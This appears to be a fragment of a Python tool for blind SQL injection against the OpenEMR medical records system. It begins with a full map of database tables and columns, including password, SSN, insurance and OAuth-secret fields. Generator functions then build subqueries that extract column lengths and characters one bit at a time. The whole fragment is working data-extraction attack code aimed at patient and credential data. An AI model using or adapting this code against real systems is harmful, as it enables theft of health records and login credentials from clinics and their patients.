"intellectual_decline", "memory_problems", "dementia", "n_headache", "s_cancer", "psoriasis", "s_acne", "s_other", "s_disease", "p_diagnosis", "p_medication", "depression", "anxiety", "social_difficulties", "thyroid_problems", "diabetes", "abnormal_blood", "anemia", "fh_blood_problems", "bleeding_problems", "allergies", "frequent_illness", "hiv", "hai_status" ], "form_soap": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "subjective", "objective", "assessment", "plan" ], "form_taskman": [ "ID", "REQ_DATE", "FROM_ID", "TO_ID", "PATIENT_ID", "DOC_TYPE", "DOC_ID", "ENC_ID", "METHOD", "COMPLETED", "COMPLETED_DATE", "COMMENT", "USERFIELD_1" ], "form_vitals": [ "id", "uuid", "date", "pid", "user", "groupname", "authorized", "activity", "bps", "bpd", "weight", "height", "temperature", "temp_method", "pulse", "respiration", "note", "BMI", "BMI_status", "waist_circ", "head_circ", "oxygen_saturation", "oxygen_flow_rate", "external_id", "ped_weight_height", "ped_bmi", "ped_head_circ", "inhaled_oxygen_concentration", "last_updated" ], "form_vitals_calculation": [ "id", "uuid", "encounter", "pid", "date_start", "date_end", "created_at", "updated_at", "created_by", "updated_by", "calculation_id" ], "form_vitals_calculation_components": [ "id", "fvc_uuid", "vitals_column", "value", "value_string", "value_unit", "component_order" ], "form_vitals_calculation_form_vitals": [ "fvc_uuid", "vitals_id" ], "form_vital_details": [ "id", "form_id", "vitals_column", "interpretation_list_id", "interpretation_option_id", "interpretation_codes", "interpretation_title", "reason_code", "reason_description", "reason_status" ], "gacl_acl": [ "id", "section_value", "allow", "enabled", "return_value", "note", "updated_date" ], "gacl_acl_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_acl_seq": [ "id" ], "gacl_aco": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_aco_map": [ "acl_id", "section_value", "value" ], 
"gacl_aco_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_aco_sections_seq": [ "id" ], "gacl_aco_seq": [ "id" ], "gacl_aro": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_aro_groups": [ "id", "parent_id", "lft", "rgt", "name", "value" ], "gacl_aro_groups_id_seq": [ "id" ], "gacl_aro_groups_map": [ "acl_id", "group_id" ], "gacl_aro_map": [ "acl_id", "section_value", "value" ], "gacl_aro_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_aro_sections_seq": [ "id" ], "gacl_aro_seq": [ "id" ], "gacl_axo": [ "id", "section_value", "value", "order_value", "name", "hidden" ], "gacl_axo_groups": [ "id", "parent_id", "lft", "rgt", "name", "value" ], "gacl_axo_groups_map": [ "acl_id", "group_id" ], "gacl_axo_map": [ "acl_id", "section_value", "value" ], "gacl_axo_sections": [ "id", "value", "order_value", "name", "hidden" ], "gacl_groups_aro_map": [ "group_id", "aro_id" ], "gacl_groups_axo_map": [ "group_id", "axo_id" ], "gacl_phpgacl": [ "name", "value" ], "globals": [ "gl_name", "gl_index", "gl_value" ], "gprelations": [ "type1", "id1", "type2", "id2" ], "groups": [ "id", "name", "user" ], "history_data": [ "id", "uuid", "coffee", "tobacco", "alcohol", "sleep_patterns", "exercise_patterns", "seatbelt_use", "counseling", "hazardous_activities", "recreational_drugs", "last_breast_exam", "last_mammogram", "last_gynocological_exam", "last_rectal_exam", "last_prostate_exam", "last_physical_exam", "last_sigmoidoscopy_colonoscopy", "last_ecg", "last_cardiac_echo", "last_retinal", "last_fluvax", "last_pneuvax", "last_ldl", "last_hemoglobin", "last_psa", "last_exam_results", "history_mother", "dc_mother", "history_father", "dc_father", "history_siblings", "dc_siblings", "history_offspring", "dc_offspring", "history_spouse", "dc_spouse", "relatives_cancer", "relatives_tuberculosis", "relatives_diabetes", "relatives_high_blood_pressure", "relatives_heart_problems", "relatives_stroke", "relatives_epilepsy", 
"relatives_mental_illness", "relatives_suicide", "cataract_surgery", "tonsillectomy", "cholecystestomy", "heart_surgery", "hysterectomy", "hernia_repair", "hip_replacement", "knee_replacement", "appendectomy", "date", "pid", "name_1", "value_1", "name_2", "value_2", "additional_history", "exams", "usertext11", "usertext12", "usertext13", "usertext14", "usertext15", "usertext16", "usertext17", "usertext18", "usertext19", "usertext20", "usertext21", "usertext22", "usertext23", "usertext24", "usertext25", "usertext26", "usertext27", "usertext28", "usertext29", "usertext30", "userdate11", "userdate12", "userdate13", "userdate14", "userdate15", "userarea11", "userarea12", "created_by" ], "icd10_dx_order_code": [ "dx_id", "dx_code", "formatted_dx_code", "valid_for_coding", "short_desc", "long_desc", "active", "revision" ], "icd10_gem_dx_10_9": [ "map_id", "dx_icd10_source", "dx_icd9_target", "flags", "active", "revision" ], "icd10_gem_dx_9_10": [ "map_id", "dx_icd9_source", "dx_icd10_target", "flags", "active", "revision" ], "icd10_gem_pcs_10_9": [ "map_id", "pcs_icd10_source", "pcs_icd9_target", "flags", "active", "revision" ], "icd10_gem_pcs_9_10": [ "map_id", "pcs_icd9_source", "pcs_icd10_target", "flags", "active", "revision" ], "icd10_pcs_order_code": [ "pcs_id", "pcs_code", "valid_for_coding", "short_desc", "long_desc", "active", "revision" ], "icd10_reimbr_dx_9_10": [ "map_id", "code", "code_cnt", "ICD9_01", "ICD9_02", "ICD9_03", "ICD9_04", "ICD9_05", "ICD9_06", "active", "revision" ], "icd10_reimbr_pcs_9_10": [ "map_id", "code", "code_cnt", "ICD9_01", "ICD9_02", "ICD9_03", "ICD9_04", "ICD9_05", "ICD9_06", "active", "revision" ], "icd9_dx_code": [ "dx_id", "dx_code", "formatted_dx_code", "short_desc", "long_desc", "active", "revision" ], "icd9_dx_long_code": [ "dx_id", "dx_code", "long_desc", "active", "revision" ], "icd9_sg_code": [ "sg_id", "sg_code", "formatted_sg_code", "short_desc", "long_desc", "active", "revision" ], "icd9_sg_long_code": [ "sq_id", 
"sg_code", "long_desc", "active", "revision" ], "immunizations": [ "id", "uuid", "patient_id", "administered_date", "immunization_id", "cvx_code", "manufacturer", "lot_number", "administered_by_id", "administered_by", "education_date", "vis_date", "note", "create_date", "update_date", "created_by", "updated_by", "amount_administered", "amount_administered_unit", "expiration_date", "route", "administration_site", "added_erroneously", "external_id", "completion_status", "information_source", "refusal_reason", "ordering_provider", "reason_code", "reason_description", "encounter_id" ], "immunization_observation": [ "imo_id", "imo_im_id", "imo_pid", "imo_criteria", "imo_criteria_value", "imo_user", "imo_code", "imo_codetext", "imo_codetype", "imo_vis_date_published", "imo_vis_date_presented", "imo_date_observation" ], "insurance_companies": [ "id", "uuid", "name", "attn", "cms_id", "ins_type_code", "x12_receiver_id", "x12_default_partner_id", "alt_cms_id", "inactive", "eligibility_id", "x12_default_eligibility_id", "cqm_sop", "date_created", "last_updated" ], "insurance_data": [ "id", "uuid", "type", "provider", "plan_name", "policy_number", "group_number", "subscriber_lname", "subscriber_mname", "subscriber_fname", "subscriber_relationship", "subscriber_ss", "subscriber_DOB", "subscriber_street", "subscriber_postal_code", "subscriber_city", "subscriber_state", "subscriber_country", "subscriber_phone", "subscriber_employer", "subscriber_employer_street", "subscriber_employer_postal_code", "subscriber_employer_state", "subscriber_employer_country", "subscriber_employer_city", "copay", "date", "pid", "subscriber_sex", "accept_assignment", "policy_type", "subscriber_street_line_2", "subscriber_employer_street_line_2", "date_end" ], "insurance_numbers": [ "id", "provider_id", "insurance_company_id", "provider_number", "rendering_provider_number", "group_number", "provider_number_type", "rendering_provider_number_type" ], "insurance_type_codes": [ "id", "type", "claim_type" 
], "ip_tracking": [ "id", "ip_string", "total_ip_login_fail_counter", "ip_login_fail_counter", "ip_last_login_fail", "ip_auto_block_emailed", "ip_force_block", "ip_no_prevent_timing_attack" ], "issue_encounter": [ "id", "pid", "list_id", "encounter", "resolved", "uuid", "created_by", "updated_by", "created_at", "updated_at" ], "issue_types": [ "active", "category", "type", "plural", "singular", "abbreviation", "style", "force_show", "ordering", "aco_spec" ], "jwt_grant_history": [ "id", "jti", "client_id", "jti_exp", "creation_date" ], "keys": [ "id", "name", "value" ], "lang_constants": [ "cons_id", "constant_name" ], "lang_custom": [ "lang_description", "lang_code", "constant_name", "definition" ], "lang_definitions": [ "def_id", "cons_id", "lang_id", "definition" ], "lang_languages": [ "lang_id", "lang_code", "lang_description", "lang_is_rtl" ], "layout_group_properties": [ "grp_form_id", "grp_group_id", "grp_title", "grp_subtitle", "grp_mapping", "grp_seq", "grp_activity", "grp_repeats", "grp_columns", "grp_size", "grp_issue_type", "grp_aco_spec", "grp_save_close", "grp_init_open", "grp_referrals", "grp_unchecked", "grp_services", "grp_products", "grp_diags", "grp_last_update" ], "layout_options": [ "form_id", "field_id", "group_id", "title", "seq", "data_type", "uor", "fld_length", "max_length", "list_id", "titlecols", "datacols", "default_value", "edit_options", "description", "fld_rows", "list_backup_id", "source", "conditions", "validation", "codes" ], "lbf_data": [ "form_id", "field_id", "field_value" ], "lbt_data": [ "form_id", "field_id", "field_value" ], "lists": [ "id", "uuid", "date", "type", "subtype", "title", "udi", "udi_data", "begdate", "enddate", "returndate", "occurrence", "classification", "referredby", "extrainfo", "diagnosis", "activity", "comments", "pid", "user", "groupname", "outcome", "destination", "reinjury_id", "injury_part", "injury_type", "injury_grade", "reaction", "verification", "external_allergyid", "erx_source", "erx_uploaded", 
"modifydate", "severity_al", "external_id", "list_option_id" ], "lists_medication": [ "id", "list_id", "drug_dosage_instructions", "usage_category", "usage_category_title", "request_intent", "request_intent_title", "medication_adherence_information_source", "medication_adherence", "medication_adherence_date_asserted", "prescription_id", "is_primary_record", "reporting_source_record_id" ], "lists_touch": [ "pid", "type", "date" ], "list_options": [ "list_id", "option_id", "title", "seq", "is_default", "option_value", "mapping", "notes", "codes", "toggle_setting_1", "toggle_setting_2", "activity", "subtype", "edit_options", "timestamp", "last_updated" ], "log": [ "id", "date", "event", "category", "user", "groupname", "comments", "user_notes", "patient_id", "success", "checksum", "crt_user", "log_from", "menu_item_id", "ccda_doc_id" ], "login_mfa_registrations": [ "user_id", "name", "last_challenge", "method", "var1", "var2" ], "log_comment_encrypt": [ "id", "log_id", "encrypt", "checksum", "checksum_api", "version" ], "medex_icons": [ "i_UID", "msg_type", "msg_status", "i_description", "i_html", "i_blob" ], "medex_outgoing": [ "msg_uid", "msg_pid", "msg_pc_eid", "campaign_uid", "msg_date", "msg_type", "msg_reply", "msg_extra_text", "medex_uid" ], "medex_prefs": [ "MedEx_id", "ME_username", "ME_api_key", "ME_facilities", "ME_providers", "ME_hipaa_default_override", "PHONE_country_code", "MSGS_default_yes", "POSTCARDS_local", "POSTCARDS_remote", "LABELS_local", "LABELS_choice", "combine_time", "postcard_top", "status", "MedEx_lastupdated" ], "medex_recalls": [ "r_ID", "r_PRACTID", "r_pid", "r_eventDate", "r_facility", "r_provider", "r_reason", "r_created" ], "misc_address_book": [ "id", "fname", "mname", "lname", "street", "city", "state", "zip", "phone" ], "modules": [ "mod_id", "mod_name", "mod_directory", "mod_parent", "mod_type", "mod_active", "mod_ui_name", "mod_relative_link", "mod_ui_order", "mod_ui_active", "mod_description", "mod_nick_name", "mod_enc_menu", 
"permissions_item_table", "directory", "date", "sql_run", "type", "sql_version", "acl_version" ], "modules_hooks_settings": [ "id", "mod_id", "enabled_hooks", "attached_to" ], "modules_settings": [ "mod_id", "fld_type", "obj_name", "menu_name", "path" ], "module_acl_group_settings": [ "module_id", "group_id", "section_id", "allowed" ], "module_acl_sections": [ "section_id", "section_name", "parent_section", "section_identifier", "module_id" ], "module_acl_user_settings": [ "module_id", "user_id", "section_id", "allowed" ], "module_configuration": [ "module_config_id", "module_id", "field_name", "field_value", "created_by", "date_added", "updated_by", "date_modified", "date_created" ], "multiple_db": [ "id", "namespace", "username", "password", "dbname", "host", "port", "date" ], "notes": [ "id", "foreign_id", "note", "owner", "date", "revision" ], "notification_log": [ "iLogId", "pid", "pc_eid", "sms_gateway_type", "smsgateway_info", "message", "email_sender", "email_subject", "type", "patient_info", "pc_eventDate", "pc_endDate", "pc_startTime", "pc_endTime", "dSentDateTime" ], "notification_settings": [ "SettingsId", "Send_SMS_Before_Hours", "Send_Email_Before_Hours", "SMS_gateway_username", "SMS_gateway_password", "SMS_gateway_apikey", "type" ], "oauth_clients": [ "client_id", "client_role", "client_name", "client_secret", "registration_token", "registration_uri_path", "register_date", "revoke_date", "contacts", "redirect_uri", "grant_types", "scope", "user_id", "site_id", "is_confidential", "logout_redirect_uris", "jwks_uri", "jwks", "initiate_login_uri", "endorsements", "policy_uri", "tos_uri", "is_enabled", "skip_ehr_launch_authorization_flow", "dsi_type" ], "oauth_trusted_user": [ "id", "user_id", "client_id", "scope", "persist_login", "time", "code", "session_cache", "grant_type" ], "onetime_auth": [ "id", "pid", "create_user_id", "context", "access_count", "remote_ip", "onetime_pin", "onetime_token", "redirect_url", "expires", "date_created", 
"last_accessed", "scope", "profile", "onetime_actions" ], "onotes": [ "id", "date", "body", "user", "groupname", "activity" ], "onsite_documents": [ "id", "pid", "facility", "provider", "encounter", "create_date", "doc_type", "patient_signed_status", "patient_signed_time", "authorize_signed_time", "accept_signed_status", "authorizing_signator", "review_date", "denial_reason", "authorized_signature", "patient_signature", "full_document", "file_name", "file_path", "template_data" ], "onsite_mail": [ "id", "date", "owner", "user", "groupname", "activity", "authorized", "header", "title", "body", "recipient_id", "recipient_name", "sender_id", "sender_name", "assigned_to", "deleted", "delete_date", "mtype", "message_status", "mail_chain", "reply_mail_chain", "is_msg_encrypted" ], "onsite_messages": [ "id", "username", "message", "ip", "date", "sender_id", "recip_id" ], "onsite_online": [ "hash", "ip", "last_update", "username", "userid" ], "onsite_portal_activity": [ "id", "date", "patient_id", "activity", "require_audit", "pending_action", "action_taken", "status", "narrative", "table_action", "table_args", "action_user", "action_taken_time", "checksum" ], "onsite_signatures": [ "id", "status", "type", "created", "lastmod", "pid", "encounter", "user", "activity", "authorized", "signator", "sig_image", "signature", "sig_hash", "ip" ], "openemr_modules": [ "pn_id", "pn_name", "pn_type", "pn_displayname", "pn_description", "pn_regid", "pn_directory", "pn_version", "pn_admin_capable", "pn_user_capable", "pn_state" ], "openemr_module_vars": [ "pn_id", "pn_modname", "pn_name", "pn_value" ], "openemr_postcalendar_categories": [ "pc_catid", "pc_constant_id", "pc_catname", "pc_catcolor", "pc_catdesc", "pc_recurrtype", "pc_enddate", "pc_recurrspec", "pc_recurrfreq", "pc_duration", "pc_end_date_flag", "pc_end_date_type", "pc_end_date_freq", "pc_end_all_day", "pc_dailylimit", "pc_cattype", "pc_active", "pc_seq", "aco_spec", "pc_last_updated" ], "openemr_postcalendar_events": [ 
"pc_eid", "pc_catid", "pc_multiple", "pc_aid", "pc_pid", "pc_gid", "pc_title", "pc_time", "pc_hometext", "pc_comments", "pc_counter", "pc_topic", "pc_informant", "pc_eventDate", "pc_endDate", "pc_duration", "pc_recurrtype", "pc_recurrspec", "pc_recurrfreq", "pc_startTime", "pc_endTime", "pc_alldayevent", "pc_location", "pc_conttel", "pc_contname", "pc_contemail", "pc_website", "pc_fee", "pc_eventstatus", "pc_sharing", "pc_language", "pc_apptstatus", "pc_prefcatid", "pc_facility", "pc_sendalertsms", "pc_sendalertemail", "pc_billing_location", "pc_room", "uuid" ], "patient_access_onsite": [ "id", "pid", "portal_username", "portal_pwd", "portal_pwd_status", "portal_login_username", "portal_onetime", "date_created" ], "patient_birthday_alert": [ "pid", "user_id", "turned_off_on" ], "patient_care_experience_preferences": [ "id", "uuid", "patient_id", "observation_code", "observation_code_text", "value_type", "value_code", "value_code_system", "value_display", "value_text", "value_boolean", "effective_datetime", "status", "note" ], "patient_data": [ "id", "uuid", "title", "language", "financial", "fname", "lname", "mname", "DOB", "street", "postal_code", "city", "state", "country_code", "drivers_license", "ss", "occupation", "phone_home", "phone_biz", "phone_contact", "phone_cell", "pharmacy_id", "status", "contact_relationship", "date", "sex", "referrer", "referrerID", "providerID", "ref_providerID", "email", "email_direct", "ethnoracial", "race", "ethnicity", "religion", "interpretter", "migrantseasonal", "family_size", "monthly_income", "billing_note", "homeless", "financial_review", "pubpid", "pid", "genericname1", "genericval1", "genericname2", "genericval2", "hipaa_mail", "hipaa_voice", "hipaa_notice", "hipaa_message", "hipaa_allowsms", "hipaa_allowemail", "squad", "fitness", "referral_source", "usertext1", "usertext2", "usertext3", "usertext4", "usertext5", "usertext6", "usertext7", "usertext8", "userlist1", "userlist2", "userlist3", "userlist4", "userlist5", 
"userlist6", "userlist7", "pricelevel", "regdate", "contrastart", "completed_ad", "ad_reviewed", "vfc", "mothersname", "guardiansname", "allow_imm_reg_use", "allow_imm_info_share", "allow_health_info_ex", "allow_patient_portal", "deceased_date", "deceased_reason", "soap_import_status", "cmsportal_login", "care_team_provider", "care_team_facility", "care_team_status", "county", "industry", "imm_reg_status", "imm_reg_stat_effdate", "publicity_code", "publ_code_eff_date", "protect_indicator", "prot_indi_effdate", "guardianrelationship", "guardiansex", "guardianaddress", "guardiancity", "guardianstate", "guardianpostalcode", "guardiancountry", "guardianphone", "guardianworkphone", "guardianemail", "sexual_orientation", "gender_identity", "birth_fname", "birth_lname", "birth_mname", "dupscore", "name_history", "suffix", "street_line_2", "patient_groups", "prevent_portal_apps", "provider_since_date", "created_by", "updated_by", "preferred_name", "nationality_country", "last_updated", "tribal_affiliations", "sex_identified", "interpreter_needed", "advance_directive_user_authenticator" ], "patient_history": [ "id", "uuid", "date", "care_team_provider", "care_team_facility", "pid", "history_type_key", "previous_name_prefix", "previous_name_first", "previous_name_middle", "previous_name_last", "previous_name_suffix", "previous_name_enddate", "created_by" ], "patient_portal_menu": [ "patient_portal_menu_id", "patient_portal_menu_group_id", "menu_name", "menu_order", "menu_status" ], "patient_reminders": [ "id", "active", "date_inactivated", "reason_inactivated", "due_status", "pid", "category", "item", "date_created", "date_sent", "voice_status", "sms_status", "email_status", "mail_status" ], "patient_settings": [ "setting_patient", "setting_label", "setting_value" ], "patient_tracker": [ "id", "date", "apptdate", "appttime", "eid", "pid", "original_user", "encounter", "lastseq", "random_drug_test", "drug_screen_completed" ], "patient_tracker_element": [ "pt_tracker_id", 
"start_datetime", "room", "status", "seq", "user" ], "patient_treatment_intervention_preferences": [ "id", "uuid", "patient_id", "observation_code", "observation_code_text", "value_type", "value_code", "value_code_system", "value_display", "value_text", "value_boolean", "effective_datetime", "status", "note" ], "payments": [ "id", "pid", "dtime", "encounter", "user", "method", "source", "amount1", "amount2", "posted1", "posted2" ], "payment_gateway_details": [ "id", "service_name", "login_id", "transaction_key", "md5" ], "payment_processing_audit": [ "uuid", "service", "pid", "success", "action_name", "amount", "ticket", "transaction_id", "audit_data", "date", "map_uuid", "map_transaction_id", "reverted", "revert_action_name", "revert_transaction_id", "revert_audit_data", "revert_date" ], "person": [ "id", "uuid", "title", "first_name", "middle_name", "last_name", "preferred_name", "gender", "birth_date", "death_date", "marital_status", "race", "ethnicity", "preferred_language", "communication", "ssn", "active", "inactive_reason", "inactive_date", "notes", "created_date", "created_by", "updated_date", "updated_by" ], "person_patient_link": [ "id", "person_id", "patient_id", "linked_date", "linked_by", "link_method", "notes", "active" ], "pharmacies": [ "id", "name", "transmit_method", "email", "ncpdp", "npi" ], "phone_numbers": [ "id", "country_code", "area_code", "prefix", "number", "type", "foreign_id" ], "pnotes": [ "id", "date", "body", "pid", "user", "groupname", "activity", "authorized", "title", "assigned_to", "deleted", "message_status", "portal_relation", "is_msg_encrypted", "update_by", "update_date" ], "preference_value_sets": [ "id", "loinc_code", "answer_code", "answer_system", "answer_display", "answer_definition", "sort_order", "active" ], "prescriptions": [ "id", "uuid", "patient_id", "filled_by_id", "pharmacy_id", "date_added", "date_modified", "provider_id", "encounter", "start_date", "drug", "drug_id", "rxnorm_drugcode", "form", "dosage", 
"quantity", "size", "unit", "route", "interval", "substitute", "refills", "per_refill", "filled_date", "medication", "note", "active", "datetime", "user", "site", "prescriptionguid", "erx_source", "erx_uploaded", "drug_info_erx", "external_id", "end_date", "indication", "prn", "ntx", "rtx", "txDate", "usage_category", "usage_category_title", "request_intent", "request_intent_title", "drug_dosage_instructions", "created_by", "updated_by", "diagnosis" ], "prices": [ "pr_id", "pr_selector", "pr_level", "pr_price" ], "procedure_answers": [ "procedure_order_id", "procedure_order_seq", "question_code", "answer_seq", "answer", "procedure_code" ], "procedure_order": [ "procedure_order_id", "uuid", "provider_id", "patient_id", "encounter_id", "date_collected", "date_ordered", "order_priority", "order_status", "patient_instructions", "activity", "control_id", "lab_id", "specimen_type", "specimen_location", "specimen_volume", "date_transmitted", "clinical_hx", "external_id", "history_order", "order_diagnosis", "billing_type", "specimen_fasting", "order_psc", "order_abn", "collector_id", "account", "account_facility", "provider_number", "procedure_order_type", "scheduled_date", "scheduled_start", "scheduled_end", "performer_type", "order_intent", "location_id" ], "procedure_order_code": [ "procedure_order_id", "procedure_order_seq", "procedure_code", "procedure_name", "procedure_source", "diagnoses", "do_not_send", "procedure_order_title", "procedure_type", "transport", "date_end", "reason_code", "reason_description", "reason_date_low", "reason_date_high", "reason_status" ], "procedure_order_relationships": [ "id", "procedure_order_id", "resource_type", "resource_uuid", "relationship", "created_at", "created_by" ], "procedure_providers": [ "ppid", "uuid", "name", "npi", "send_app_id", "send_fac_id", "recv_app_id", "recv_fac_id", "DorP", "direction", "protocol", "remote_host", "login", "password", "orders_path", "results_path", "notes", "lab_director", "active", "type", 
"date_created", "last_updated" ], "procedure_questions": [ "lab_id", "procedure_code", "question_code", "seq", "question_text", "required", "maxsize", "fldtype", "options", "tips", "activity" ], "procedure_report": [ "procedure_report_id", "uuid", "procedure_order_id", "procedure_order_seq", "date_collected", "date_collected_tz", "date_report", "date_report_tz", "source", "specimen_num", "report_status", "review_status", "report_notes" ], "procedure_result": [ "procedure_result_id", "uuid", "procedure_report_id", "result_data_type", "result_code", "result_text", "date", "facility", "units", "result", "range", "abnormal", "comments", "document_id", "result_status", "date_end" ], "procedure_specimen": [ "procedure_specimen_id", "uuid", "procedure_order_id", "procedure_order_seq", "specimen_identifier", "accession_identifier", "specimen_type_code", "specimen_type", "collection_method_code", "collection_method", "specimen_location_code", "specimen_location", "collected_date", "collection_date_low", "collection_date_high", "volume_value", "volume_unit", "condition_code", "specimen_condition", "comments", "created_at", "updated_at", "created_by", "updated_by", "deleted" ], "procedure_type": [ "procedure_type_id", "parent", "name", "lab_id", "procedure_code", "procedure_type", "body_site", "specimen", "route_admin", "laterality", "description", "standard_code", "related_code", "units", "range", "seq", "activity", "notes", "transport", "procedure_type_name" ], "product_registration": [ "id", "email", "opt_out", "auth_by_id", "telemetry_disabled", "last_ask_date", "last_ask_version", "options" ], "product_warehouse": [ "pw_drug_id", "pw_warehouse", "pw_min_level", "pw_max_level" ], "pro_assessments": [ "id", "form_oid", "form_name", "user_id", "deadline", "patient_id", "assessment_oid", "status", "score", "error", "created_at", "updated_at" ], "questionnaire_repository": [ "id", "uuid", "questionnaire_id", "provider", "version", "created_date", "modified_date", "name", 
"type", "profile", "active", "status", "source_url", "code", "code_display", "questionnaire", "lform", "category" ], "questionnaire_response": [ "id", "uuid", "response_id", "questionnaire_foreign_id", "questionnaire_id", "questionnaire_name", "patient_id", "encounter", "audit_user_id", "creator_user_id", "create_time", "last_updated", "version", "status", "questionnaire", "questionnaire_response", "form_response", "form_score", "tscore", "error" ], "recent_patients": [ "user_id", "patients" ], "registry": [ "name", "state", "directory", "id", "sql_run", "unpackaged", "date", "priority", "category", "nickname", "patient_encounter", "therapy_group_encounter", "aco_spec", "form_foreign_id" ], "report_itemized": [ "report_id", "itemized_test_id", "numerator_label", "pass", "pid", "rule_id", "item_details" ], "report_results": [ "report_id", "field_id", "field_value" ], "rule_action": [ "id", "group_id", "category", "item" ], "rule_action_item": [ "category", "item", "clin_rem_link", "reminder_message", "custom_flag" ], "rule_filter": [ "id", "include_flag", "required_flag", "method", "method_detail", "value" ], "rule_patient_data": [ "id", "date", "pid", "category", "item", "complete", "result" ], "rule_reminder": [ "id", "method", "method_detail", "value" ], "rule_target": [ "id", "group_id", "include_flag", "required_flag", "method", "value", "interval" ], "sequences": [ "id" ], "session_tracker": [ "uuid", "created", "last_updated", "number_scripts" ], "shared_attributes": [ "pid", "encounter", "field_id", "last_update", "user_id", "field_value" ], "standardized_tables_track": [ "id", "imported_date", "name", "revision_version", "revision_date", "file_checksum" ], "supported_external_dataloads": [ "load_id", "load_type", "load_source", "load_release_date", "load_filename", "load_checksum" ], "syndromic_surveillance": [ "id", "lists_id", "submission_date", "filename" ], "template_users": [ "tu_id", "tu_user_id", "tu_facility_id", "tu_template_id", 
"tu_template_order" ], "therapy_groups": [ "group_id", "group_name", "group_start_date", "group_end_date", "group_type", "group_participation", "group_status", "group_notes", "group_guest_counselors" ], "therapy_groups_counselors": [ "group_id", "user_id" ], "therapy_groups_participants": [ "group_id", "pid", "group_patient_status", "group_patient_start", "group_patient_end", "group_patient_comment" ], "therapy_groups_participant_attendance": [ "form_id", "pid", "meeting_patient_comment", "meeting_patient_status" ], "track_events": [ "id", "event_type", "event_label", "event_url", "event_target", "first_event", "last_event", "label_count" ], "transactions": [ "id", "date", "title", "pid", "user", "groupname", "authorized" ], "users": [ "id", "uuid", "username", "password", "authorized", "info", "source", "fname", "mname", "lname", "suffix", "federaltaxid", "federaldrugid", "upin", "facility", "facility_id", "see_auth", "active", "npi", "title", "specialty", "billname", "email", "email_direct", "google_signin_email", "url", "assistant", "organization", "valedictory", "street", "streetb", "city", "state", "zip", "street2", "streetb2", "city2", "state2", "zip2", "phone", "fax", "phonew1", "phonew2", "phonecell", "notes", "cal_ui", "taxonomy", "calendar", "abook_type", "default_warehouse", "irnpool", "state_license_number", "weno_prov_id", "newcrop_user_role", "cpoe", "physician_type", "main_menu_role", "patient_menu_role", "portal_user", "supervisor_id", "billing_facility", "billing_facility_id", "date_created", "last_updated", "country_code", "country_code2" ], "users_facility": [ "tablename", "table_id", "facility_id", "warehouse_id" ], "users_secure": [ "id", "username", "password", "last_update_password", "last_update", "password_history1", "password_history2", "password_history3", "password_history4", "last_challenge_response", "login_work_area", "total_login_fail_counter", "login_fail_counter", "last_login_fail", "auto_block_emailed" ], "user_settings": [ 
"setting_user", "setting_label", "setting_value" ], "uuid_mapping": [ "id", "uuid", "resource", "resource_path", "table", "target_uuid", "created" ], "uuid_registry": [ "uuid", "table_id", "table_vertical", "couchdb", "document_drive", "mapped", "created" ], "valueset": [ "nqf_code", "code", "code_system", "code_type", "valueset", "description", "valueset_name" ], "valueset_oid": [ "nqf_code", "code", "code_system", "code_type", "valueset", "description", "valueset_name" ], "verify_email": [ "id", "pid_holder", "email", "language", "fname", "mname", "lname", "dob", "token_onetime", "active" ], "version": [ "v_major", "v_minor", "v_patch", "v_realpatch", "v_tag", "v_database", "v_acl" ], "voids": [ "void_id", "patient_id", "encounter_id", "what_voided", "date_original", "date_voided", "user_id", "amount1", "amount2", "other_info", "reason", "notes" ], "x12_partners": [ "id", "name", "id_number", "x12_sender_id", "x12_receiver_id", "processing_format", "x12_isa01", "x12_isa02", "x12_isa03", "x12_isa04", "x12_isa05", "x12_isa07", "x12_isa14", "x12_isa15", "x12_gs02", "x12_per06", "x12_dtp03", "x12_gs03", "x12_submitter_id", "x12_submitter_name", "x12_sftp_login", "x12_sftp_pass", "x12_sftp_host", "x12_sftp_port", "x12_sftp_local_dir", "x12_sftp_remote_dir", "x12_token_endpoint", "x12_eligibility_endpoint", "x12_claim_status_endpoint", "x12_attachment_endpoint", "x12_client_id", "x12_client_secret" ], "x12_remote_tracker": [ "id", "x12_partner_id", "x12_filename", "status", "claims", "messages", "created_at", "updated_at" ] }

# Module-level state shared between `process` (which writes it) and the
# generators below (which read it). The generators are consumed lazily, so
# each value is decoded by `process` before the loop that depends on it runs.
current_string_size = 0  # last decoded LENGTH(column) value
current_line_number = 0  # last decoded COUNT(*) value
last_string_id = ""  # results key of the most recently decoded character


def _bits_to_int(bits: str) -> int:
    """Interpret *bits* as a base-2 digit string and return its integer value."""
    return int(bits, 2)


def generate_length_bit_queries(table: str, column: str, offset: int, max_bits: int = 8):
    """
    Generates SQL subqueries that each test one bit of the LENGTH(column) value.

    Bits are produced least-significant first (divisors 2**0, 2**1, ...).
    `table`, `column` and `offset` are interpolated into the SQL text as
    given; nothing in this function validates or quotes them.

    :param table: SQL table name
    :param column: Column name
    :param offset: OFFSET for LIMIT 1
    :param max_bits: Number of bits to extract (default 8 for max length 255)
    :yield: ``(name, query)`` for each bit, with ``name`` of the form
            ``'length <table>.<column> <offset>'``, followed by one
            ``(name, None)`` pair that marks the end of the value
    """
    for bit in range(max_bits):
        div_value = 2 ** bit
        yield f'length {table}.{column} {offset}', (
            f"(SELECT ((LENGTH({column}) DIV {div_value}) MOD 2) "
            f"FROM {table} "
            f"LIMIT 1 OFFSET {offset})"
        )
    # End-of-value marker: the consumer decodes the collected bits when the
    # second element is None.
    yield f'length {table}.{column} {offset}', None


def generate_char_bit_queries(table: str, column: str, offset: int, char_position: int, bit_count: int = 8):
    """
    Generates SQL subqueries that each test one bit of a single character.

    The character is selected with SUBSTRING(column, char_position, 1) and
    converted with ASCII(); bits are produced least-significant first.

    :param table: SQL table name
    :param column: Column name
    :param offset: OFFSET for LIMIT 1
    :param char_position: Character index (1-based)
    :param bit_count: Number of bits (default 8 for ASCII)
    :yield: ``(name, query)`` for each bit, with ``name`` of the form
            ``'ascii <table> <column> <offset> <char_position>'``, followed
            by one ``(name, None)`` end-of-value pair
    """
    for bit in range(bit_count):
        div_value = 2 ** bit
        yield f'ascii {table} {column} {offset} {char_position}', (
            f"(SELECT ((ASCII(SUBSTRING({column},{char_position},1)) DIV {div_value}) MOD 2) "
            f"FROM {table} "
            f"LIMIT 1 OFFSET {offset})"
        )
    # End-of-value marker for this character.
    yield f'ascii {table} {column} {offset} {char_position}', None


